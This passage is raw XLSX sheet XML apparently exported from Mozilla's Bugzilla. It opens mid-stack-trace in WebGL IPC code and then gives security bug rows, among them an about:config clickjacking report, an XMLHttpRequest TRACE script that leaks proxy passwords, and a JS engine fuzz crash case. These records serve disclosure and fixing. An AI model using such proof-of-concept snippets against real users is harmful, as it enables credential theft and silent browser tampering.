2f (Inline Function) --------`-------- xul!mozilla::MethodDispatcher&lt;WebGLMethodDispatcher,48,void (mozilla::HostWebGLContext::*)(unsigned int, unsigned int) const,&amp;mozilla::HostWebGLContext::Hint&gt;::DispatchCommand+0x2e33 [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 236] 
30 (Inline Function) --------`-------- xul!mozilla::MethodDispatcher&lt;WebGLMethodDispatcher,47,void (mozilla::HostWebGLContext::*)(unsigned int) const,&amp;mozilla::HostWebGLContext::FrontFace&gt;::DispatchCommand+0x2e33 [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 236] 
31 (Inline Function) --------`-------- xul!mozilla::MethodDispatcher&lt;WebGLMethodDispatcher,46,void (mozilla::HostWebGLContext::*)(unsigned int, unsigned int, unsigned int, unsigned long long, int, int, int) const,&amp;mozilla::HostWebGLContext::FramebufferAttach&gt;::DispatchCommand+0x2e33 [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 236] 
32 (Inline Function) --------`-------- xul!mozilla::MethodDispatcher&lt;WebGLMethodDispatcher,45,void (mozilla::HostWebGLContext::*)() const,&amp;mozilla::HostWebGLContext::Flush&gt;::DispatchCommand+0x2e33 [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 236] 
33 (Inline Function) --------`-------- xul!mozilla::MethodDispatcher&lt;WebGLMethodDispatcher,44,void (mozilla::HostWebGLContext::*)(unsigned long long, unsigned long long) const,&amp;mozilla::HostWebGLContext::DetachShader&gt;::DispatchCommand+0x2e33 [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 236] 
34 (Inline Function) --------`-------- xul!mozilla::MethodDispatcher&lt;WebGLMethodDispatcher,43,void (mozilla::HostWebGLContext::*)(float, float)
const,&amp;mozilla::HostWebGLContext::DepthRange&gt;::DispatchCommand+0x38a4 [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 236] 
35 (Inline Function) --------`-------- xul!mozilla::MethodDispatcher&lt;WebGLMethodDispatcher,42,void (mozilla::HostWebGLContext::*)(bool) const,&amp;mozilla::HostWebGLContext::DepthMask&gt;::DispatchCommand+0x38a4 [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 236] 
36 (Inline Function) --------`-------- xul!mozilla::MethodDispatcher&lt;WebGLMethodDispatcher,41,void (mozilla::HostWebGLContext::*)(unsigned int) const,&amp;mozilla::HostWebGLContext::DepthFunc&gt;::DispatchCommand+0x3e79 [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 236] 
37 (Inline Function) --------`-------- xul!mozilla::MethodDispatcher&lt;WebGLMethodDispatcher,40,void (mozilla::HostWebGLContext::*)(unsigned int) const,&amp;mozilla::HostWebGLContext::CullFace&gt;::DispatchCommand+0x3e79 [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 236] 
38 (Inline Function) --------`-------- xul!mozilla::MethodDispatcher&lt;WebGLMethodDispatcher,39,void (mozilla::HostWebGLContext::*)(unsigned long long) const,&amp;mozilla::HostWebGLContext::CompileShader&gt;::DispatchCommand+0x3f1a [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 236] 
39 (Inline Function) --------`-------- xul!mozilla::MethodDispatcher&lt;WebGLMethodDispatcher,38,void (mozilla::HostWebGLContext::*)(bool, bool, bool, bool) const,&amp;mozilla::HostWebGLContext::ColorMask&gt;::DispatchCommand+0x3f1a [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 236] 
3a (Inline Function) --------`-------- xul!mozilla::MethodDispatcher&lt;WebGLMethodDispatcher,37,void (mozilla::HostWebGLContext::*)(int) const,&amp;mozilla::HostWebGLContext::ClearStencil&gt;::DispatchCommand+0x3f1a [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 236] 
3b (Inline Function) --------`-------- xul!mozilla::MethodDispatcher&lt;WebGLMethodDispatcher,36,void (mozilla::HostWebGLContext::*)(float) const,&amp;mozilla::HostWebGLContext::ClearDepth&gt;::DispatchCommand+0x3f62 [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 236] 
3c (Inline Function) --------`-------- xul!mozilla::MethodDispatcher&lt;WebGLMethodDispatcher,35,void (mozilla::HostWebGLContext::*)(float, float, float, float) const,&amp;mozilla::HostWebGLContext::ClearColor&gt;::DispatchCommand+0x3f62 [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 236] 
3d (Inline Function) --------`-------- xul!mozilla::MethodDispatcher&lt;WebGLMethodDispatcher,34,void (mozilla::HostWebGLContext::*)(unsigned int) const,&amp;mozilla::HostWebGLContext::Clear&gt;::DispatchCommand+0x3f62 [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 236] 
3e (Inline Function) --------`-------- xul!mozilla::MethodDispatcher&lt;WebGLMethodDispatcher,33,void (mozilla::HostWebGLContext::*)(unsigned int, unsigned int, unsigned int, unsigned int) const,&amp;mozilla::HostWebGLContext::BlendFuncSeparate&gt;::DispatchCommand+0x3f62 [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 236] 
3f (Inline Function) --------`-------- xul!mozilla::MethodDispatcher&lt;WebGLMethodDispatcher,32,void (mozilla::HostWebGLContext::*)(unsigned int, unsigned int) const,&amp;mozilla::HostWebGLContext::BlendEquationSeparate&gt;::DispatchCommand+0x3f62 [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 236] 
40 (Inline Function) --------`-------- xul!mozilla::MethodDispatcher&lt;WebGLMethodDispatcher,31,void (mozilla::HostWebGLContext::*)(float, float, float, float) const,&amp;mozilla::HostWebGLContext::BlendColor&gt;::DispatchCommand+0x3f62 [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 236] 
41 (Inline Function) --------`-------- xul!mozilla::MethodDispatcher&lt;WebGLMethodDispatcher,30,void (mozilla::HostWebGLContext::*)(unsigned int, unsigned long long) const,&amp;mozilla::HostWebGLContext::BindFramebuffer&gt;::DispatchCommand+0x3f62 [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 236] 
42 (Inline Function) --------`-------- xul!mozilla::MethodDispatcher&lt;WebGLMethodDispatcher,29,void (mozilla::HostWebGLContext::*)(unsigned long long, unsigned int, const std::basic_string&lt;char,std::char_traits&lt;char&gt;,std::allocator&lt;char&gt; &gt; &amp;) const,&amp;mozilla::HostWebGLContext::BindAttribLocation&gt;::DispatchCommand+0x3f62 [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 236] 
43 (Inline Function) --------`-------- xul!mozilla::MethodDispatcher&lt;WebGLMethodDispatcher,28,void (mozilla::HostWebGLContext::*)(unsigned long long, unsigned long long) const,&amp;mozilla::HostWebGLContext::AttachShader&gt;::DispatchCommand+0x3f62 [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 236] 
44 (Inline Function) --------`-------- xul!mozilla::MethodDispatcher&lt;WebGLMethodDispatcher,27,void (mozilla::HostWebGLContext::*)(),&amp;mozilla::HostWebGLContext::DidRefresh&gt;::DispatchCommand+0x3f62 [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 236] 
45 (Inline Function) --------`-------- xul!mozilla::MethodDispatcher&lt;WebGLMethodDispatcher,26,void (mozilla::HostWebGLContext::*)(mozilla::WebGLExtensionID),&amp;mozilla::HostWebGLContext::RequestExtension&gt;::DispatchCommand+0x4069 [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 236] 
46 (Inline Function) --------`-------- xul!mozilla::MethodDispatcher&lt;WebGLMethodDispatcher,25,void (mozilla::HostWebGLContext::*)(const mozilla::avec2&lt;unsigned int&gt;
&amp;),&amp;mozilla::HostWebGLContext::Resize&gt;::DispatchCommand+0x4069 [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 236] 
47 (Inline Function) --------`-------- xul!mozilla::MethodDispatcher&lt;WebGLMethodDispatcher,24,void (mozilla::HostWebGLContext::*)(unsigned int, const std::basic_string&lt;char,std::char_traits&lt;char&gt;,std::allocator&lt;char&gt; &gt; &amp;) const,&amp;mozilla::HostWebGLContext::GenerateError&gt;::DispatchCommand+0x4069 [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 236] 
48 (Inline Function) --------`-------- xul!mozilla::MethodDispatcher&lt;WebGLMethodDispatcher,23,void (mozilla::HostWebGLContext::*)(unsigned int) const,&amp;mozilla::HostWebGLContext::Enable&gt;::DispatchCommand+0x4069 [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 236] 
49 (Inline Function) --------`-------- xul!mozilla::MethodDispatcher&lt;WebGLMethodDispatcher,22,void (mozilla::HostWebGLContext::*)(unsigned int) const,&amp;mozilla::HostWebGLContext::Disable&gt;::DispatchCommand+0x4069 [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 236] 
4a (Inline Function) --------`-------- xul!mozilla::MethodDispatcher&lt;WebGLMethodDispatcher,21,void (mozilla::HostWebGLContext::*)(unsigned long long),&amp;mozilla::HostWebGLContext::DeleteVertexArray&gt;::DispatchCommand+0x4069 [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 236] 
4b (Inline Function) --------`-------- xul!mozilla::MethodDispatcher&lt;WebGLMethodDispatcher,20,void (mozilla::HostWebGLContext::*)(unsigned long long),&amp;mozilla::HostWebGLContext::DeleteTransformFeedback&gt;::DispatchCommand+0x4069 [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 236] 
4c (Inline Function) --------`-------- xul!mozilla::MethodDispatcher&lt;WebGLMethodDispatcher,19,void (mozilla::HostWebGLContext::*)(unsigned long long),&amp;mozilla::HostWebGLContext::DeleteTexture&gt;::DispatchCommand+0x4069 [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 236] 
4d (Inline Function) --------`-------- xul!mozilla::MethodDispatcher&lt;WebGLMethodDispatcher,18,void (mozilla::HostWebGLContext::*)(unsigned long long),&amp;mozilla::HostWebGLContext::DeleteSync&gt;::DispatchCommand+0x4069 [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 236] 
4e (Inline Function) --------`-------- xul!mozilla::MethodDispatcher&lt;WebGLMethodDispatcher,17,void (mozilla::HostWebGLContext::*)(unsigned long long),&amp;mozilla::HostWebGLContext::DeleteShader&gt;::DispatchCommand+0x4069 [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 236] 
4f (Inline Function) --------`-------- xul!mozilla::MethodDispatcher&lt;WebGLMethodDispatcher,16,void (mozilla::HostWebGLContext::*)(unsigned long long),&amp;mozilla::HostWebGLContext::DeleteSampler&gt;::DispatchCommand+0x4069 [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 236] 
50 (Inline Function) --------`-------- xul!mozilla::MethodDispatcher&lt;WebGLMethodDispatcher,15,void (mozilla::HostWebGLContext::*)(unsigned long long),&amp;mozilla::HostWebGLContext::DeleteRenderbuffer&gt;::DispatchCommand+0x4069 [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 236] 
51 (Inline Function) --------`-------- xul!mozilla::MethodDispatcher&lt;WebGLMethodDispatcher,14,void (mozilla::HostWebGLContext::*)(unsigned long long),&amp;mozilla::HostWebGLContext::DeleteQuery&gt;::DispatchCommand+0x4069 [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 236] 
52 (Inline Function) --------`-------- xul!mozilla::MethodDispatcher&lt;WebGLMethodDispatcher,13,void (mozilla::HostWebGLContext::*)(unsigned long long),&amp;mozilla::HostWebGLContext::DeleteProgram&gt;::DispatchCommand+0x4069 [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 236] 
53 (Inline Function) --------`-------- xul!mozilla::MethodDispatcher&lt;WebGLMethodDispatcher,12,void (mozilla::HostWebGLContext::*)(unsigned long long),&amp;mozilla::HostWebGLContext::DeleteFramebuffer&gt;::DispatchCommand+0x4069 [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 236] 
54 (Inline Function) --------`-------- xul!mozilla::MethodDispatcher&lt;WebGLMethodDispatcher,11,void (mozilla::HostWebGLContext::*)(unsigned long long),&amp;mozilla::HostWebGLContext::DeleteBuffer&gt;::DispatchCommand+0x4069 [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 236] 
55 (Inline Function) --------`-------- xul!mozilla::MethodDispatcher&lt;WebGLMethodDispatcher,10,void (mozilla::HostWebGLContext::*)(unsigned long long),&amp;mozilla::HostWebGLContext::CreateVertexArray&gt;::DispatchCommand+0x4069 [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 236] 
56 (Inline Function) --------`-------- xul!mozilla::MethodDispatcher&lt;WebGLMethodDispatcher,9,void (mozilla::HostWebGLContext::*)(unsigned long long),&amp;mozilla::HostWebGLContext::CreateTransformFeedback&gt;::DispatchCommand+0x4069 [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 236]
57 (Inline Function) --------`-------- xul!mozilla::MethodDispatcher&lt;WebGLMethodDispatcher,8,void (mozilla::HostWebGLContext::*)(unsigned long long),&amp;mozilla::HostWebGLContext::CreateTexture&gt;::DispatchCommand+0x4069 [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 236] 
58 (Inline Function) --------`-------- xul!mozilla::MethodDispatcher&lt;WebGLMethodDispatcher,7,void (mozilla::HostWebGLContext::*)(unsigned long long),&amp;mozilla::HostWebGLContext::CreateSync&gt;::DispatchCommand+0x4069 [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 236] 
59 (Inline Function) --------`-------- xul!mozilla::MethodDispatcher&lt;WebGLMethodDispatcher,6,void (mozilla::HostWebGLContext::*)(unsigned long long, unsigned int),&amp;mozilla::HostWebGLContext::CreateShader&gt;::DispatchCommand+0x4069 [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 236] 
5a (Inline Function) --------`-------- xul!mozilla::MethodDispatcher&lt;WebGLMethodDispatcher,5,void (mozilla::HostWebGLContext::*)(unsigned long long),&amp;mozilla::HostWebGLContext::CreateSampler&gt;::DispatchCommand+0x4069 [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 236] 
5b (Inline Function) --------`-------- xul!mozilla::MethodDispatcher&lt;WebGLMethodDispatcher,4,void (mozilla::HostWebGLContext::*)(unsigned long long),&amp;mozilla::HostWebGLContext::CreateRenderbuffer&gt;::DispatchCommand+0x4069 [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 236] 
5c (Inline Function) --------`-------- xul!mozilla::MethodDispatcher&lt;WebGLMethodDispatcher,3,void (mozilla::HostWebGLContext::*)(unsigned long long),&amp;mozilla::HostWebGLContext::CreateQuery&gt;::DispatchCommand+0x4069 [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 236] 
5d (Inline Function) --------`-------- xul!mozilla::MethodDispatcher&lt;WebGLMethodDispatcher,2,void (mozilla::HostWebGLContext::*)(unsigned long long),&amp;mozilla::HostWebGLContext::CreateProgram&gt;::DispatchCommand+0x4069 [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 236] 
5e (Inline Function) --------`-------- xul!mozilla::MethodDispatcher&lt;WebGLMethodDispatcher,1,void (mozilla::HostWebGLContext::*)(unsigned long long),&amp;mozilla::HostWebGLContext::CreateFramebuffer&gt;::DispatchCommand+0x4069 [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 236] 
5f (Inline Function) --------`-------- xul!mozilla::MethodDispatcher&lt;WebGLMethodDispatcher,0,void (mozilla::HostWebGLContext::*)(unsigned long long),&amp;mozilla::HostWebGLContext::CreateBuffer&gt;::DispatchCommand+0x407c [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 236] 
60 00000072`d163ea20 00007ffb`c614d8b6 xul!mozilla::dom::WebGLParent::RecvDispatchCommands+0x41d4 [/builds/worker/checkouts/gecko/dom/canvas/WebGLParent.cpp @ 61] 
61 00000072`d163ecc0 00007ffb`c5296714 xul!mozilla::dom::PWebGLParent::OnMessageReceived+0x306 [/builds/worker/workspace/obj-build/ipc/ipdl/PWebGLParent.cpp @ 201] 
62 00000072`d163ed90 00007ffb`c5f47c7d xul!mozilla::layers::PCompositorManagerParent::OnMessageReceived+0x64 [/builds/worker/workspace/obj-build/ipc/ipdl/PCompositorManagerParent.cpp @ 205] 63 (Inline Function) --------`-------- xul!mozilla::ipc::MessageChannel::DispatchAsyncMessage+0x74 [/builds/worker/checkouts/gecko/ipc/glue/MessageChannel.cpp @ 2153] 
64 00000072`d163ee90 00007ffb`c4d04355 xul!mozilla::ipc::MessageChannel::DispatchMessage+0x40d [/builds/worker/checkouts/gecko/ipc/glue/MessageChannel.cpp @ 2077] 
65 (Inline Function) --------`-------- xul!mozilla::ipc::MessageChannel::RunMessage+0xf7 [/builds/worker/checkouts/gecko/ipc/glue/MessageChannel.cpp @ 1925] 
66 (Inline Function) --------`-------- xul!mozilla::ipc::MessageChannel::MessageTask::Run+0x16d [/builds/worker/checkouts/gecko/ipc/glue/MessageChannel.cpp @ 1956] 
67 00000072`d163f220 00007ffb`c4d02502 xul!nsThread::ProcessNextEvent+0x1a15 [/builds/worker/checkouts/gecko/xpcom/threads/nsThread.cpp @ 1152] 
68 (Inline Function) --------`-------- xul!NS_ProcessNextEvent+0x28 [/builds/worker/checkouts/gecko/xpcom/threads/nsThreadUtils.cpp @ 548] 
69 00000072`d163f5b0 00007ffb`c5f210bf xul!mozilla::ipc::MessagePumpForNonMainThreads::Run+0xf2 [/builds/worker/checkouts/gecko/ipc/glue/MessagePump.cpp @ 302] 
6a (Inline Function) --------`-------- xul!MessageLoop::RunInternal+0x16 [/builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc @ 335] 
6b 00000072`d163f650 00007ffb`c4d023ce xul!MessageLoop::RunHandler+0x2f [/builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc @ 329] 
6c 00000072`d163f6a0 00007ffb`c5ac3d77 xul!MessageLoop::Run+0x4e [/builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc @ 311] 
6d 00000072`d163f700 00007ffb`e90a6d5a xul!nsThrea</t>
        </is>
      </c>
      <c r="X6263" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6264">
      <c r="A6264" t="n">
        <v>280664</v>
      </c>
      <c r="B6264" t="inlineStr">
        <is>
          <t>2005-02-01 08:05:16 -0800</t>
        </is>
      </c>
      <c r="C6264" t="inlineStr">
        <is>
          <t>Using Flash and the -moz-opacity filter you can get access to about:config and make the user silently change values [secunia http://secunia.com/advisories/14160/ moderately critcial ]</t>
        </is>
      </c>
      <c r="D6264" t="inlineStr">
        <is>
          <t>2022-05-16 12:51:10 -0700</t>
        </is>
      </c>
      <c r="E6264" t="n">
        <v>1</v>
      </c>
      <c r="F6264" t="n">
        <v>1</v>
      </c>
      <c r="G6264" t="n">
        <v>6</v>
      </c>
      <c r="H6264" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I6264" t="inlineStr">
        <is>
          <t>Core Graveyard</t>
        </is>
      </c>
      <c r="J6264" t="inlineStr">
        <is>
          <t>Plug-ins</t>
        </is>
      </c>
      <c r="K6264" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L6264" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M6264" t="inlineStr">
        <is>
          <t>Windows XP</t>
        </is>
      </c>
      <c r="N6264" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O6264" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6264" t="inlineStr">
        <is>
          <t>[sg:fix]</t>
        </is>
      </c>
      <c r="Q6264" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R6264" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6264" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T6264" t="n">
        <v>1</v>
      </c>
      <c r="U6264" t="n">
        <v>0</v>
      </c>
      <c r="V6264" t="n">
        <v>22</v>
      </c>
      <c r="W6264" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.5) Gecko/20041107 Firefox/1.0
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.5) Gecko/20041107 Firefox/1.0
Using Flash and the -moz-opacity filter it is possible to display the
about:config site in a hidden frame.
By making the user double-click at a specific screen position (e.g. using a
DHTML game) you can toggle the status of boolean config parameters.
As long as the number of about:config parameters is unchanged (unlikly a casual
user will change them) you can move the parameter you want to change to the
specified screen position by using CSS (change the .hideframe class). 
Reproducible: Always
Steps to Reproduce:
1. Open http://www.mikx.de/fireflashing/
2. Open example link (make sure Flash 7 is installed)
3. Double click inside the red box
Actual Results:  
You can silently toggle any boolean config parameter
Expected Results:  
Security manager should prevent that a plugin can open about:config or file:///
links
This bug also affects Mozilla 1.7.5 and Netscape 7.1, but Mozilla raises a
dialog instead of toggeling a boolean value and Netscape does not support the
-moz-opacity filter.</t>
        </is>
      </c>
      <c r="X6264" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6265">
      <c r="A6265" t="n">
        <v>302489</v>
      </c>
      <c r="B6265" t="inlineStr">
        <is>
          <t>2005-07-28 05:28:02 -0700</t>
        </is>
      </c>
      <c r="C6265" t="inlineStr">
        <is>
          <t>XMLHTTP TRACE method can reveal proxy passwords to web sites</t>
        </is>
      </c>
      <c r="D6265" t="inlineStr">
        <is>
          <t>2007-04-01 15:13:44 -0700</t>
        </is>
      </c>
      <c r="E6265" t="n">
        <v>1</v>
      </c>
      <c r="F6265" t="n">
        <v>1</v>
      </c>
      <c r="G6265" t="n">
        <v>3</v>
      </c>
      <c r="H6265" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6265" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J6265" t="inlineStr">
        <is>
          <t>XML</t>
        </is>
      </c>
      <c r="K6265" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L6265" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M6265" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N6265" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6265" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6265" t="inlineStr">
        <is>
          <t>[sg:fix]</t>
        </is>
      </c>
      <c r="Q6265" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R6265" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S6265" t="inlineStr">
        <is>
          <t>mozilla1.8beta4</t>
        </is>
      </c>
      <c r="T6265" t="n">
        <v>1</v>
      </c>
      <c r="U6265" t="n">
        <v>0</v>
      </c>
      <c r="V6265" t="n">
        <v>18</v>
      </c>
      <c r="W6265" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (X11; U; Linux i686; ja-JP; rv:1.7.8) Gecko/20050513 Debian/1.7.8-1
Build Identifier: Mozilla/5.0 (X11; U; Linux i686; ja-JP; rv:1.7.8) Gecko/20050513 Debian/1.7.8-1
Proxy authentication passwords are stolen by malicious Javascript.
In addition, the web authentication passwords for any pages on the 
same web servers (including ones for other people's web contents)
can also be stolen.
Reproducible: Always
Steps to Reproduce:
Let victims execute the following Javascript.
 xmlhttp = new XMLHttpRequest();
 xmlhttp.open("TRACE", "a.html");
 xmlhttp.setRequestHeader("Max-Forwards", "0");
 xmlhttp.onreadystatechange=function() {
 if (xmlhttp.readyState==4) {
  alert("Status: " + xmlhttp.status + "\n" + xmlhttp.responseText)
 }
 }
 xmlhttp.send(null)
}
Expected Results:  
TRACE request should be banned, at least for scripts.
Splitted from bug 297078 after successed constructing an exploit.
If plugins are allowed to use Mozilla's internal HTTP layer,
there may be a similar problem. Please check them, too.</t>
        </is>
      </c>
      <c r="X6265" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6266">
      <c r="A6266" t="n">
        <v>1143380</v>
      </c>
      <c r="B6266" t="inlineStr">
        <is>
          <t>2015-03-14 23:38:44 -0700</t>
        </is>
      </c>
      <c r="C6266" t="inlineStr">
        <is>
          <t>Intermittent "marionette.errors.TimeoutException: TimeoutException: timed out waiting for emulator to start" or " mozrunner.errors.TimeoutException: timed out waiting for emulator to start" errors on B2G mochitest runs</t>
        </is>
      </c>
      <c r="D6266" t="inlineStr">
        <is>
          <t>2016-01-10 19:06:01 -0800</t>
        </is>
      </c>
      <c r="E6266" t="n">
        <v>1</v>
      </c>
      <c r="F6266" t="n">
        <v>1</v>
      </c>
      <c r="G6266" t="n">
        <v>3</v>
      </c>
      <c r="H6266" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6266" t="inlineStr">
        <is>
          <t>Testing</t>
        </is>
      </c>
      <c r="J6266" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K6266" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L6266" t="inlineStr">
        <is>
          <t>ARM</t>
        </is>
      </c>
      <c r="M6266" t="inlineStr">
        <is>
          <t>Gonk (Firefox OS)</t>
        </is>
      </c>
      <c r="N6266" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6266" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6266" t="inlineStr"/>
      <c r="Q6266" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R6266" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S6266" t="inlineStr">
        <is>
          <t>mozilla46</t>
        </is>
      </c>
      <c r="T6266" t="n">
        <v>1</v>
      </c>
      <c r="U6266" t="n">
        <v>0</v>
      </c>
      <c r="V6266" t="n">
        <v>655</v>
      </c>
      <c r="W6266" t="inlineStr">
        <is>
          <t>+++ This bug was initially created as a clone of Bug #989048 +++
Nothing like it was in the glory days when failing to properly start the Linux host was making them constantly fail, but the bug existed before that problem, and still exists after it.</t>
        </is>
      </c>
      <c r="X6266" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6267">
      <c r="A6267" t="n">
        <v>758408</v>
      </c>
      <c r="B6267" t="inlineStr">
        <is>
          <t>2012-05-24 15:03:36 -0700</t>
        </is>
      </c>
      <c r="C6267" t="inlineStr">
        <is>
          <t>"Assertion failure: &amp;obj-&gt;getSlotRef(slot) == this,"</t>
        </is>
      </c>
      <c r="D6267" t="inlineStr">
        <is>
          <t>2013-02-04 14:07:15 -0800</t>
        </is>
      </c>
      <c r="E6267" t="n">
        <v>1</v>
      </c>
      <c r="F6267" t="n">
        <v>1</v>
      </c>
      <c r="G6267" t="n">
        <v>3</v>
      </c>
      <c r="H6267" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6267" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J6267" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K6267" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L6267" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M6267" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N6267" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O6267" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6267" t="inlineStr">
        <is>
          <t>[js:inv:p1][advisory-tracking+]</t>
        </is>
      </c>
      <c r="Q6267" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R6267" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S6267" t="inlineStr">
        <is>
          <t>mozilla17</t>
        </is>
      </c>
      <c r="T6267" t="n">
        <v>1</v>
      </c>
      <c r="U6267" t="n">
        <v>0</v>
      </c>
      <c r="V6267" t="n">
        <v>23</v>
      </c>
      <c r="W6267" t="inlineStr">
        <is>
          <t>Created attachment 626983
stack (including Valgrind stack)
function f(y) {
  x = ["", "", "", "", "", "", "", "", "", "", "", "", "", ""]
  for (var i = 0; i &lt; x.length; ++i) {
    y[i] = []
  }
  return y
}
evalcx("undefined.function::e", f(evalcx("lazy")))
asserts js debug shell on m-c changeset 6ad95e65d74d without any CLI arguments at Assertion failure: &amp;obj-&gt;getSlotRef(slot) == this,
s-s because Valgrind shows invalid reads in an opt build.
autoBisect shows this is probably related to the following changeset:
The first bad revision is:
changeset:   93639:fbff86190de6
user:        Brian Hackett
date:        Wed May 09 14:14:10 2012 -0700
summary:     Don't throw away JIT code for compartments in web pages displaying animations, bug 750834. r=billm</t>
        </is>
      </c>
      <c r="X6267" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6268">
      <c r="A6268" t="n">
        <v>131568</v>
      </c>
      <c r="B6268" t="inlineStr">
        <is>
          <t>2002-03-17 08:59:27 -0800</t>
        </is>
      </c>
